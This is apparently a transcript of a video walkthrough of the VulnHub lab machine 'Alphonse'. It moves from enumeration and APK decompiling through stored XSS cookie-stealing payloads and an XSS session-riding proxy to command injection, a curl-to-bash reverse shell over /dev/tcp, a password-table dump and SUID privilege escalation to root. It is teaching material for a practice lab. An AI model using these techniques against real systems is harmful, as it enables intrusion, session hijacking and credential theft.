Hey, hello everyone, this is Matsek again, here with another video. This time we'll be taking a look over Alphonse. This is a pretty fun and interesting machine. And well, this is the basic scan. Once again, tag PN to tell Nmap that the host is already up and running. Tag SV to perform a service version detection scan plus a C appended to it. To make it run some default scripts to each of those, like this one. All of this information that you see says default script, and well, on all ports. Now what do we have here? We have a 21 FTP with anonymous FTP login allowed. It is running VSFTPD 3.0.3. It's also running Apache 2.4.38 in the 80 and Samba. I think there's nothing to see here in Samba, so we will be focusing specifically in these two ports, right? Now, whenever we go to this IP address, we don't see anything, or it's forbidden, right? Now, let me try, for example, well, here, let me fuzz. And we'll be using a user list, which is user share airbuster world list directory list 2.3 medium 200 threads, and we will see nothing. But in the meantime, it's also useful because we can start enumerating our FTP server. Now, once you enter as anonymous, there you go. Always, since this is a Windows system, we can ls tag LA, and let's go to pub first. There's nothing, so let's go back to dev. We have DNA analyzer or DN analyzer.apk, which we definitely want to bring that back to our home, right? I hope it works because it's a binary. If not, we will be googling how to download it without any trouble, but let's see. So let me move DNL analyzers to content. Now, this case, since this is an APK, we have an APK tool named literally that, APK tool. Now here, we can specify a command or an argument option, which is going to be D as in decode. Let me find it. And I don't see it here. Usage APK tool D from decode and some options. So we want to D and DNA analyzer, all that, and it's going to be like unzipping it all the way until we got the very files, right? Like the raw files. So once that's done, and as you can see here below, we won't have any useful directory or file. Obviously, here you want to try pausing for .txt files, PHP files, HTML files, JS files, whatever you want. But yeah, and in this case, let's go to our newly created file or directory. And look at that. Obviously, we want to take a look over everything, right? APK tool YAML. What else? There's a super important file over here in res, values, and strings. Sometimes you will find some leaked information here. Maybe some kind of token, API key, whatever you want, right? But yeah, in the meantime, since there's a lot of files and we are not forming a let's say a static analysis, like to find every single vulnerability, there are also some programs that will allow us to run, like in an emulator, to run the APK just to see how it works and the functionality and all this stuff. In this case, I want to rep, for example, well, like this. With tag I make it non-gain sensitive, and with tag R, I specify I wanna make the process like recursively. So I want to try looking for a token, and we can take a look at it, see if we find something. I can tell you we will not. And let me key, for example. Same thing. Feel free to take a look at it. Maybe you can find something I did not. And something I tried as well, since we didn't find anything on the HTTP server, is looking for HTTP, right? Now I can see that there's a lot of information here, right? However, for example, look at this HTTP, and actually let me do it like this because I want to just rep for well, URLs, right? And let me grep v. Oh well, look at that. This is super interesting. We have some routes. Let me just grep out the schemas word, because as you can see, this will narrow down our search. We have HTTP Alphonse DNA Analyzer API protected result.php login register. Let's take a look at that. But in the meantime, well, actually, let me just let me see this here first. Look at this. This is, well, clearly an API endpoint, so there is no such thing as a UI interface, right? But we see something interesting here. Now we can call this with curl and see the message we're not seeing. Let me use tags S to avoid unnecessary noise. And in the meantime, let me keep fuzzing in the N analyzer here, just to see if there are other things. And we do have some other directories. Let me add a tagger to redirect. And we have an API which is forbidden. And we have a portal which is 300 status OK. So let me go with that. Portal. You can, and a vendor which is forbidden as well. Let's let it load up. But in the meantime, look at that. Okay, so we have login, and it is expecting a username and a password. So let me go with this, like username test and password test, just to see what's up. And login failed. Okay, fair enough. First of all, let me just have this and save it here, for example, routes. Cool. Now when I check the register thing, see what's behind it. So it's expecting a username, password, DNA string. Cool. So remember, this is an API, right? So there's, oh, look at that, we have a portal. Admin, wrong username and password. Cool. And let me try something here. I want to create a username. So username is going to be tester, actually, and tester. Password is going to be and tester as well, and DNA string just going to be test, because I don't know what's that. And user was successfully registered. And if we try to log in with this, let me check login.php. Let's just edit out the DNA string, and wow, successful login. And we have a JOT token which we will be decoding to see what information is transporting. Jot.io. Let us check that before moving on. Well, in the meantime, let me just pen tester and pen tester. Oh well, yeah, I changed my network adapter. So look at this. Alphonse, the audience, that might be a key, could be something important. An ID and the username, pen tester, but we don't see any valuable information here. This is the expiration time, some other epoch times we don't really, we aren't really interested about. So cool. Let's go back here and wait for our login page to load. God. Portal again, in tester, and I'm gonna copy it and paste it here. Wrong username and password. So the users we're creating are not working in that login page. Okay, now remember that this is something important. Even though this is an API. I mean, this is API information, and we don't see it always as I don't know, some kind of UI interface. There's a possibility that the information stored in these variables, for example in this one, it's visible for some users. So we might have success playing around with some injections, right? Since there's a portal and maybe there's an administrator inside this portal seeing the DNA results or whatever it is, we can trigger an XSS vulnerability to get us a cookie, right? So if you don't know how to do that, you can just Google XSS cookie stealing. Once again, back to my NAT network adapter. Look at this. For example, this one, right? And I want Python 3 and HTTP server. Just for if in case we receive a connection back. And let me see this. We can use this one, I think. For example, look at this. So nano XSS payload. Let me go back one directory. We can just edit this out. Define a script. Then this one. And this one. That should work, maybe. Let's try that. If we cut that out, we then use xclip to copy and paste it. Then we use curl to register once again. Then we might use DNA string equals this. All right. Cool. Let's send it. Oh no, that was not. 56 101 port 8000. And I'm gonna be taking, for example, picture.jpg or dna.jpg equals dimensions or whatever, and document.cookie, right? Let's try that, see what's up. Again, let me go back here. This is a headache, total headache. Cool, user was successfully registered. Well, let's wait a bit. Remember, if some script doesn't work, doesn't mean it is not vulnerable to it. Maybe we just need to find a workaround, right? For example, I can try nano XSS payload 2. Let me copy that just to guide myself, and I'm gonna be maybe not script, but an img, right? So source, let me get a source and do this. Cool. I think it's like that. I say so. So again, http 192.168 150, well, 56 101 8000, and then picture, a jpg, dimensions equals, and here plus document dot cookie, right? Now I'm not really sure if this has to have a semicolon at the end. I'd say no. That would be my first inclination. So let me just try this right here. Now let's send another one. Maybe this is not working. There you go. Now let's send it. See what's up. 101, yes. 8000, cool. Picture, dimensions, document.cookie. Cool. Let's just wait a bit. Cool. So I just cropped the video while this request came back, and here we go. So we have a request. Look at this. It's actually getting the picture.jpg dimensions, but it's not getting us any cookie value, right? Now that is highly unusual, I'd say, because this is a portal, right? I mean, look at this. I'm not even logged in, and I do have a PHP session ID. Now, why it's not working? Well, there's one possibility here, and is that these guys are using some HTTP flag, HTTP only flag, and if you searched about it, only flag, you will notice this is a flag used in cookies to have them only answer to HTTP rather than JavaScript. That will invalidate most of the cross-site scripting attacks, right? Let's just read a bit. Look at that. If the HTTP only flag optional is included in the HTTP response header, the cookie cannot be accessed through client-side script. Again, if the browser supports this flag, most of them do this, right? So as a result, even if a cross-site scripting flaw exists and a user accidentally accesses a link that exploits this flaw, the browser, primarily Internet Explorer, will not reveal the cookie to a third party. So I can think of that. I mean, it's highly possible that this is what's happening here, right? Now, this was a hard part to get past. What I did was, so we have VulnHub and Alphonse, right? Something I've learned, for example, from people, look at this, Daniel Solstad is done a walkthrough. But something I've learned from people like 0xDF from Hack the Box, mostly, is to research the machine's creator, personal website, GitHub, all this stuff. Because you never know what you can find, right? So at this point, we have the website all set. Let's try to take a look at it, avoiding to read the write-up. And we have a GitHub here. That is super important. I mean, this guy looks like he's done the offensive security web expert cert and security uncertified expert. So, I mean, I can think that he's a coder, right? Repositories. Now, look at this. mygg.js. It looks like this guy programmed himself a tool that will do something interesting. And it says this: you get an XSS but are unable to pop the session cookies. The answer is yes. Inspired by mosquito, malaria, and beef, it's a tool to proxy web traffic via cross-site scripting by abusing session writing. Authentication tokens will automatically be appended to each request by the victim browser, enabling the attacker to browse as though they were authenticated. So that is super nice. I like that a lot. Well, when I did the machine, I already installed this. I'm just gonna be getting the file. So let me come back in here to exploits. Let me get it. Now we have this. I think we do it like this. Yes, cool. So yes, how does it work? Obviously the instructions there says it, but the thing is that we can actually, let me go here and exploits node mygg. Let me open up, fire it up there, and here I'm gonna be using the curl thing. Well, instead of this thing, what I'm gonna be using is, let me close this, not necessary. So we have a DNA string, and we just need to copy this payload stager, right? Let me see. No. Okay, let me use fire onload. Yes, let me just skip this one. This one? No. Let me just change the apostrophes for double ones and skip them here. I think that should work. Let's wait a bit. So in the meantime, if it loads, what we'll do is, yeah, I know what to do in case this doesn't work at the first try. So in the meantime, let's go. Well, we don't have internet, but please search for what is session writing. You will find out that this is a C-SARF derived vulnerability, right? Where you can have your victim execute well, 2 requests in your name. Obviously, in the process, it will be using its own cookie, so we don't have to worry about it. Just in case this didn't work, to not lose any more time, let me erase all this. String, and once again, now instead of single apostrophes here, I'm gonna be using this one, and at the end again, and I'm just gonna have to skip this and this. That way, that will be easier. So let me register, and not as a pen tester, but as a pen tester 1. That might be the issue as well. So pen tester 1 registered, cool. Well, let's wait a bit until we see it. If we do, we should have the victim's browser hooked to us, right? Okay guys, so after a long time of troubleshooting because I was not getting the connection back, here's what I did. So inside here there were a disclaimer, and you have to open your text editor with the mygg.js and change example.com for your IP. And actually, I don't know if you just have to enter your IP or HTTP ://IP, but at the end, what you gotta have is here the HTTP, your IP, and the hook.js, or otherwise, if the browser, well, in a real case scenario, if the victim's browser asks to only trust a HTTPS connection, you can do the HTTP :443, as we have it in here open, like listening, or HTTPS only and all this stuff. Well, and actually, if you in a real case scenario, You may want to create a not a self-signed certificate, but a legit one, right? So here are the instructions, all the stuff, and now we have a browser hooked. What does this mean? We can access it over a proxy. Look at this proxy server listening on 8081. Now let me see this in here. We cannot. Now we can go to my Foxy proxy and options. Let's configure it a bit because I don't know if this one will work. 8081. Well, I just need to change it, not to create another one. For burp suite, it's 8080, so I can save it in here and then come up here and enable the burp suite thing and enter. And we should see it now. Now look at that. We're inside now, abusing this is all my test users abusing the CSRF session writing, all this stuff. And this is kind of static. I mean, it's not like you're seeing it or something, though we can expect and see and check the network tab and analyze. For example, I will see a post request to analyze DNA.php. Now I want to check the source code out. I will see an analyze DNA.js. Let's check that. Now in here, now we see a post to analyze DNA.php. I mean, this file is what's handling this functionality. And look at this. It's transporting ID, value, all the stuff. We can obviously see it here on request like this, ID, all this stuff. I want to copy this and go over here and paste it. But instead of all this, I'm gonna use this only like this. Now let me close it with a single apostrophe, and instead obviously analyze DNA.php. I think it was. No, let me check that better with an underscore. There you go. Bubble. Let me see that. Analyze /DNA.php. Probably instead of this portal. Probably. The analyzer portal analyze DNA.php. Oh, well, obviously we want to use a proxy, right? Which is gonna be HTTP 127.0.0.0.1 over 81. Or is it like, no, it's like this one. Cool. And look at that, we have some requests going on behind the scenes. So cool, we do have our proxy setup. Now, why is it saying no? Let me try with this one, for example. I just want to analyze this because these are all tests, but these two look like real users, right? So Alphonse and Kevin. So let me check that out. I like to check this. Look at this, the hook connection going back to our server. Oh, cool. Let me just analyze this. And here. So 5 GATC. Okay, try that. So 5, whatever. That should work. No. Again. GTAC, was it? GATC. GATC. Got. No. Chunked, not found. Okay, that's the problem. So it's not a portal. What should it be, man? Like headers? Maybe. I mean, analyze portal, analyze DNA.php. Am I writing it? Analyze underscore DNA.php. I mean, it's alright, isn't it? Okay, so let me use this, maybe. That's a problem. Like that. Cool. Cool. We have it. So it's superb, right? Which is basically this answer, this result. Superb, weak. Now from here, we want to start testing all kind of things, right? For example, I don't know what happens when we transform the JSON to ID equals 5 and val equals GATC. Will that work? We don't have anything. Well, it looks like this doesn't work. What happens when we add another n like this, or if we add a regular another user literally? Okay, we don't see any kind of information. Now, can we escape out of a key value pair to execute commands like this? ls. Actually, let me try with ID just in case, like better. And what if we don't open this like this? Wow, look at that. It looks like there is a some kind of vulnerability where we can inject our code in here, right? Like this. And well, look at that. It updated. Super interesting. So if it's being reflected here, it is probably getting like stored in the database. So MySQL injection, we can think of that. In this case, I want to reach curl. Yes, we have curl. So let me go to my exploits directory and create an index.html file. Let me treat it as a bash script file. I'll use bin bash -c, then bash I, diff TCP 192.168.56.101 over port 4444 redirections. Go. I think it's all right. Now let me nc and blp 4444, and in here let me open up a Python simple server. Right now, here I want to curl myself and pipe the output to bash. So 192.168.101, 8000, nothing, right? And bash. Hey, look at that. We have our shell. We just popped the shell, right? So that's cool, definitely. And script def null, let's just normalize this. stty row minus echo semicolon for round as in fg, and reset the x term, and let's export term as x term so we can control C and control L. Super comfortable. So look at that, we have our cat analyze.php. Let's read that, and well, I just see it right away. So the res variable is an exec on DNA analyzer val. That's why if we can escape out of val, we can execute commands, right? That's the thing. So let's go back a little bit. Let's cat database php up, out. And well, we have user SQLite 3 in there. What else do we have here? Well, SQLite 3 users, that databases or that tables, was it? Okay, select everything from users. And look at that. We have some passwords in here. We should definitely try to crack them out. In case we can. I'm not gonna lose time with it. I don't remember, but I think it's not necessary. Cool, I'm out. Well, let me check this. LS API, what's in there? Cool. LSALA portal. Vendor. Okay. Well, let me cat etc pass.id and grab it to find any match with that sh at the end. Let me find SUIDs. We have interesting. We have nothing really. Yeah, look at that. We do have a rootme file or CDF thing, and it's obviously a SUID path. Here you go. Look at that. I mean, rootme password. Here you go. I mean, I think this is the password. Let me go with this and rootme password. This. Here you go. Root. Okay. That was easy. So cat flag, got cat flag.txt, and there you go. So yeah, that's a wrap. That's all for today, guys. I think this was a very interesting machine. I really enjoyed it doing it, and I hope you did too. So yes, that's it for all. Thank you very much for joining. Bye bye.